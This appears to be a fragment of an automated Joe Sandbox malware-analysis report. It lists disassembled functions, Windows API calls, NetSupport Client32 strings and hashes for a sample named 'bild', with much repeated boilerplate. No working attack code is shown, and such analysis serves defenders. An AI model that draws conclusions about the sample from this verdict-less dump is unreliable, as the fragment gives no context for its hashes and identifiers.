                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _free$Message_malloc_strncpy$ErrorExitLastProcessSendTimeoutWindow_memmovewsprintf
                                                                                          • String ID: IsA()$SurveyResults$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
                                                                                          • API String ID: 3960737985-1318765656
                                                                                          • Opcode ID: 6f3482f183dc71e32b0e781e0e1ae71b2587e219f1bd543c2aaaf4bdd4110b9c
                                                                                          • Instruction ID: e7dd2455d00588b8b0596ee18c4208b20e6f9302996f578dcf6f33cfb97cf12a
                                                                                          • Opcode Fuzzy Hash: 6f3482f183dc71e32b0e781e0e1ae71b2587e219f1bd543c2aaaf4bdd4110b9c
                                                                                          • Instruction Fuzzy Hash: 18C1A374E0064A9FDB04DFE4C8D0EEEF7B5BF88308F208168D519AB295DB70A945CB90
                                                                                          APIs
                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 1102D1C0
                                                                                            • Part of subcall function 111603E3: std::exception::exception.LIBCMT ref: 111603F8
                                                                                            • Part of subcall function 111603E3: __CxxThrowException@8.LIBCMT ref: 1116040D
                                                                                            • Part of subcall function 111603E3: std::exception::exception.LIBCMT ref: 1116041E
                                                                                          • _memmove.LIBCMT ref: 1102D24A
                                                                                          • _memmove.LIBCMT ref: 1102D26E
                                                                                          • _memmove.LIBCMT ref: 1102D2A8
                                                                                          • _memmove.LIBCMT ref: 1102D2C4
                                                                                          • std::exception::exception.LIBCMT ref: 1102D30E
                                                                                          • __CxxThrowException@8.LIBCMT ref: 1102D323
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
                                                                                          • String ID: deque<T> too long
                                                                                          • API String ID: 827257264-309773918
                                                                                          • Opcode ID: 6f44853749167e6417c702704c1d5fd1f6b6aa11f4fe1b268de19c2d7f3316e5
                                                                                          • Instruction ID: ae58a47b93f5c67beecf59276473b3909c5d487f19c470db74dff325715f4f31
                                                                                          • Opcode Fuzzy Hash: 6f44853749167e6417c702704c1d5fd1f6b6aa11f4fe1b268de19c2d7f3316e5
                                                                                          • Instruction Fuzzy Hash: DD41A476E00105ABDB04CE68CC81AEEB7FAAF94324F59C669DC09DB344E675EE05C790
                                                                                          APIs
                                                                                          • GetMenuItemCount.USER32(?), ref: 1100519E
                                                                                          • _memset.LIBCMT ref: 110051C0
                                                                                          • GetMenuItemID.USER32(?,00000000), ref: 110051D4
                                                                                          • CheckMenuItem.USER32(?,00000000,00000000), ref: 11005231
                                                                                          • EnableMenuItem.USER32(?,00000000,00000000), ref: 11005247
                                                                                          • GetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 11005268
                                                                                          • SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 11005294
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ItemMenu$Info$CheckCountEnable_memset
                                                                                          • String ID: 0
                                                                                          • API String ID: 2755257978-4108050209
                                                                                          • Opcode ID: ed19a4d0eac54c607b6a919a5e70af2297959f222d84ccf27589c69c777b0ba6
                                                                                          • Instruction ID: ff6163613c0a8cbc830ef1528835912891ededd95cc8b4eaa22ca2fcf9c2cdf5
                                                                                          • Opcode Fuzzy Hash: ed19a4d0eac54c607b6a919a5e70af2297959f222d84ccf27589c69c777b0ba6
                                                                                          • Instruction Fuzzy Hash: 71318E70D11219ABEB01DFA4D885BEEBBFCEF46758F008059F951E6240E7759944CB60
                                                                                          APIs
                                                                                          • _memset.LIBCMT ref: 1101D1E0
                                                                                          • GetClassInfoExA.USER32(00000000,NSMChatSizeWnd,?), ref: 1101D1FA
                                                                                          • _memset.LIBCMT ref: 1101D20A
                                                                                          • RegisterClassExA.USER32(?), ref: 1101D24B
                                                                                          • CreateWindowExA.USER32(00000000,NSMChatSizeWnd,11194244,00CF0000,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 1101D27E
                                                                                          • GetWindowRect.USER32(00000000,?), ref: 1101D28B
                                                                                          • DestroyWindow.USER32(00000000), ref: 1101D292
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Window$Class_memset$CreateDestroyInfoRectRegister
                                                                                          • String ID: NSMChatSizeWnd
                                                                                          • API String ID: 2883038198-4119039562
                                                                                          • Opcode ID: 87aebd6e18ee9abdefb850bcd11d4769ee8e47b38e4dbf48374c28c167509a6c
                                                                                          • Instruction ID: df00defde950c6a972f57fa33671139d82de9fa74eae4c6bde258e6239c9b3d1
                                                                                          • Opcode Fuzzy Hash: 87aebd6e18ee9abdefb850bcd11d4769ee8e47b38e4dbf48374c28c167509a6c
                                                                                          • Instruction Fuzzy Hash: C7314DB5D0021DAFDB10DFA5DD84BEEF7B8EB44628F20012EE925B7240D735A905CB64
                                                                                          APIs
                                                                                          • _memset.LIBCMT ref: 1103D18F
                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000125), ref: 1103D1BD
                                                                                          • CloseHandle.KERNEL32(?), ref: 1103D25C
                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1103D26C
                                                                                          • CloseHandle.KERNEL32(?), ref: 1103D279
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseHandle$FileModuleNameObjectSingleWait_memset
                                                                                          • String ID: /247$" /a$RunAnnot
                                                                                          • API String ID: 2581068044-4059077130
                                                                                          • Opcode ID: b839e70076fc368ba000d97afe45d019281ed31407febcd3e3d047b5c4491ca4
                                                                                          • Instruction ID: dc76f3c11fb5ad4c0452055a60ef983052eda761819ccc7684b04031b26646f7
                                                                                          • Opcode Fuzzy Hash: b839e70076fc368ba000d97afe45d019281ed31407febcd3e3d047b5c4491ca4
                                                                                          • Instruction Fuzzy Hash: 4541C030A04319AFEB11DFA4CC84FDDB7B9EB48704F1080A5E6589B284DB71E944CF90
                                                                                          APIs
                                                                                          • GetProcAddress.KERNEL32(00000000,11195920), ref: 1100D3A4
                                                                                          • GetProcAddress.KERNEL32(00000000,11195910), ref: 1100D3B8
                                                                                          • GetProcAddress.KERNEL32(00000000,11195900), ref: 1100D3CD
                                                                                          • GetProcAddress.KERNEL32(00000000,111958F0), ref: 1100D3E1
                                                                                          • GetProcAddress.KERNEL32(00000000,111958E4), ref: 1100D3F5
                                                                                          • GetProcAddress.KERNEL32(00000000,111958C4), ref: 1100D40A
                                                                                          • GetProcAddress.KERNEL32(00000000,111958A4), ref: 1100D41E
                                                                                          • GetProcAddress.KERNEL32(00000000,11195894), ref: 1100D432
                                                                                          • GetProcAddress.KERNEL32(00000000,11195884), ref: 1100D447
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressProc
                                                                                          • String ID:
                                                                                          • API String ID: 190572456-0
                                                                                          • Opcode ID: 091c258913195d468f5e27a1e6f31e310fab824e6ee381838cf7674ab6c2accf
                                                                                          • Instruction ID: 496fda0e4c6754f74ae7accc981fa1b683a1531f66a76574b420f2493807621a
                                                                                          • Opcode Fuzzy Hash: 091c258913195d468f5e27a1e6f31e310fab824e6ee381838cf7674ab6c2accf
                                                                                          • Instruction Fuzzy Hash: BC318A719222349FE756CBE5CCD5B7AFFE9A748B19B00417AD42083248E7B46840CF90
                                                                                          APIs
                                                                                          • GetStockObject.GDI32(00000007), ref: 11113167
                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 11113176
                                                                                          • SetBrushOrgEx.GDI32(?,00000000,00000000,00000000,?,11119DB4,?,00000001,00000001,00000000,1111E6D7,00000000,?,00000000), ref: 11113181
                                                                                          • GetStockObject.GDI32(00000000), ref: 11113189
                                                                                          • SelectObject.GDI32(?,00000000), ref: 11113192
                                                                                          • GetStockObject.GDI32(0000000D), ref: 11113196
                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 1111319F
                                                                                          • SelectClipRgn.GDI32(00000000,00000000), ref: 111131B3
                                                                                          • SelectClipRgn.GDI32(?,?), ref: 111131D5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Object$Select$Stock$Clip$Brush
                                                                                          • String ID:
                                                                                          • API String ID: 2690518013-0
                                                                                          • Opcode ID: 03940d1c13920ebdd2799aeba9173fb3b73a5c49d6e66c97bce195a3b1bf9d70
                                                                                          • Instruction ID: 6254f714a47a8412abfa64db40702d153c74c152478294c48941108971bda100
                                                                                          • Opcode Fuzzy Hash: 03940d1c13920ebdd2799aeba9173fb3b73a5c49d6e66c97bce195a3b1bf9d70
                                                                                          • Instruction Fuzzy Hash: CC114C71604214AFE320EFA9CC88F56F7E8AF48714F114529E698DB294C774E840CF60
                                                                                          APIs
                                                                                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11027053
                                                                                          • TranslateMessage.USER32(?), ref: 11027081
                                                                                          • DispatchMessageA.USER32(?), ref: 1102708B
                                                                                          • Sleep.KERNEL32(000003E8), ref: 11027114
                                                                                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 1102717A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Message$DispatchSleepTranslate
                                                                                          • String ID: Bridge$BridgeThread::Attempting to open bridge...
                                                                                          • API String ID: 3237117195-3850961587
                                                                                          • Opcode ID: 0527f6f062edf77291c750114b7d9886b355368a75c305f9b203373b5eaba6dc
                                                                                          • Instruction ID: 926780c6f4d8c8949c1ee256bdfa0d08ed5449f0693c43c0c5ab50156846c558
                                                                                          • Opcode Fuzzy Hash: 0527f6f062edf77291c750114b7d9886b355368a75c305f9b203373b5eaba6dc
                                                                                          • Instruction Fuzzy Hash: AB41B475D01626DBEB15CBEDCC84EBEBBB9AB54708F900169E92593244E735E500CBA0
                                                                                          APIs
                                                                                          • GetWindowPlacement.USER32(00000000,0000002C,110BFEBC,?,Norm,110BFEBC), ref: 110B90E4
                                                                                          • MoveWindow.USER32(00000000,110BFEBC,110BFEBC,110BFEBC,110BFEBC,00000001,?,Norm,110BFEBC), ref: 110B9156
                                                                                          • SetTimer.USER32(00000000,0000050D,000007D0,00000000), ref: 110B91B1
                                                                                            • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                            • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                            • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                            • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Window$ErrorExitLastMessageMovePlacementProcessTimerwsprintf
                                                                                          • String ID: Norm$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$j CB::OnRemoteSizeNormal(%d, %d, %d, %d)$m_hWnd
                                                                                          • API String ID: 1092798621-1973987134
                                                                                          • Opcode ID: bb4fee7a640cddfa8292c04b347aeb0b9ef3b046aecc10af90a567252941b4bf
                                                                                          • Instruction ID: fa08d4082dbdb83dc84805081e5a13701295f49ac71a08f55a689e0031bf859b
                                                                                          • Opcode Fuzzy Hash: bb4fee7a640cddfa8292c04b347aeb0b9ef3b046aecc10af90a567252941b4bf
                                                                                          • Instruction Fuzzy Hash: 6A411DB5B0020AAFDB08DFA4C895EAEF7B5FF88304F104669E519A7644DB30B945CB90
                                                                                          APIs
                                                                                            • Part of subcall function 1112A9E0: LoadLibraryA.KERNEL32(ws2_32.dll,00000000,?), ref: 1112AA16
                                                                                            • Part of subcall function 1112A9E0: GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 1112AA33
                                                                                            • Part of subcall function 1112A9E0: GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 1112AA3D
                                                                                            • Part of subcall function 1112A9E0: GetProcAddress.KERNEL32(00000000,socket), ref: 1112AA4B
                                                                                            • Part of subcall function 1112A9E0: GetProcAddress.KERNEL32(00000000,closesocket), ref: 1112AA59
                                                                                            • Part of subcall function 1112A9E0: GetProcAddress.KERNEL32(00000000,WSAIoctl), ref: 1112AA67
                                                                                            • Part of subcall function 1112A9E0: FreeLibrary.KERNEL32(00000000), ref: 1112AADC
                                                                                          • LoadLibraryA.KERNEL32(ws2_32.dll,?,?,00000000), ref: 1112B38A
                                                                                          • GetProcAddress.KERNEL32(00000000,ntohl), ref: 1112B3A2
                                                                                          • _calloc.LIBCMT ref: 1112B3AD
                                                                                          • _free.LIBCMT ref: 1112B44B
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 1112B462
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressProc$Library$FreeLoad$_calloc_free
                                                                                          • String ID: ntohl$ws2_32.dll
                                                                                          • API String ID: 2881363997-4165132517
                                                                                          • Opcode ID: a62c3fe90116abab52543d5ca7f352ed5c693b003b457ddebdd86233b9ebb92f
                                                                                          • Instruction ID: 62f3d354d7df00a53f20e52f5f0b7ab5f0e2fb1a0c0f97b8c5a029639f714dd3
                                                                                          • Opcode Fuzzy Hash: a62c3fe90116abab52543d5ca7f352ed5c693b003b457ddebdd86233b9ebb92f
                                                                                          • Instruction Fuzzy Hash: 67318D75E00229CBD7509F64CD80A9AF7B8FF48715F6081A6DC99A7200DF30AA858FD4
                                                                                          APIs
